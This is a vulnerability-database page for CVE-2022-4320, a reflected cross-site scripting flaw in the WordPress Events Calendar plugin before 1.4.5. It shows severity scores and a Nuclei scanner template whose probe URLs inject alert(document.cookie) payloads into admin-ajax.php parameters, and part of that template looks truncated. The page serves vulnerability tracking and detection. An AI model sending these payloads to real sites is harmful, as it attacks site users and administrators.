CVE-2022-4320
published 2023-01-16CVE-2022-4320: The WordPress Events Calendar WordPress plugin before 1.4.5 does not sanitize and escapes a parameter before outputting it back in the page, leading to a…
PriorityP333medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
0.89%
54.9th percentile
The WordPress Events Calendar WordPress plugin before 1.4.5 does not sanitize and escapes a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against both unauthenticated and authenticated users (such as high-privilege ones like admin).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mhsoftware | wordpress_events_calendar_plugin | < 1.4.5 | 1.4.5 |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
WordPress Events Calendar <1.4.5 - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2022-4320 [MEDIUM] WordPress Events Calendar <1.4.5 - Cross-Site Scripting
WordPress Events Calendar alert(document.cookie)'
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=alert(document.cookie)'
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=-->alert(document.cookie)'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'imgNavLeftXX\">alert(document.cookie)'
- 'alert(document.cookie)({});'
- '>alert(document.cookie).js'
condition: or
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a00463044022024016b6171d780cf18a7f3453ca3addae2ea0778b098cb9ae4e687ddb0cceef50220464682778a7b1edf9563d033d5b7e4d76348533a0d0f2d3abe9748b3046a2875:922c64590222798bb761d5b6d8e72950
2023-01-16
Published